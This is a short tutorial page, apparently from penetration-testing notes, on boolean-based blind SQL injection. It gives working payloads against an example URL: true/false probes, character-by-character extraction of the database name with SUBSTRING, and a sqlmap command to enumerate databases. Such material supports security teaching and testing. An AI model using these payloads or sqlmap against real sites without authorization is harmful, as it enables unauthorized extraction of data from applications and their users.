Boolean-Based Blind SQL Injection¶

Boolean-based blind SQLi is an inferential technique where an attacker reconstructs data by sending queries that result in one of two different responses from the application, corresponding to TRUE or FALSE.

Methodology¶

The process involves asking the database a series of true/false questions to exfiltrate information one character at a time.

1. Confirm the Vulnerability¶

First, confirm that the application responds differently to a logically true and a logically false condition.

Vulnerable URL: http://example.com/items.php?id=1

• True Condition: Inject AND 1=1. The page should load normally.

  http://example.com/items.php?id=1' AND 1=1--
  

• False Condition: Inject AND 1=2. The page should change (e.g., show an error, "item not found," or return a blank page).

  http://example.com/items.php?id=1' AND 1=2--
  

2. Enumerate Database Information¶

Once confirmed, you can start asking questions about the database.

Check Database Name Length:

-- Is the length of the database name greater than 5?
' AND (SELECT LENGTH(database())) > 5--

Extract Database Name (Character by Character): Use the SUBSTRING() function to test each character.

-- Is the first character of the database name 'a'?
' AND (SELECT SUBSTRING(database(), 1, 1)) = 'a'--

-- Is the first character of the database name 'b'?
' AND (SELECT SUBSTRING(database(), 1, 1)) = 'b'--

3. Automation with sqlmap¶

Manually performing boolean-based blind SQLi is extremely tedious. sqlmap is the ideal tool for automating this process.

# sqlmap will automatically detect and exploit boolean-based blind SQLi
sqlmap -u "http://example.com/items.php?id=1" --dbs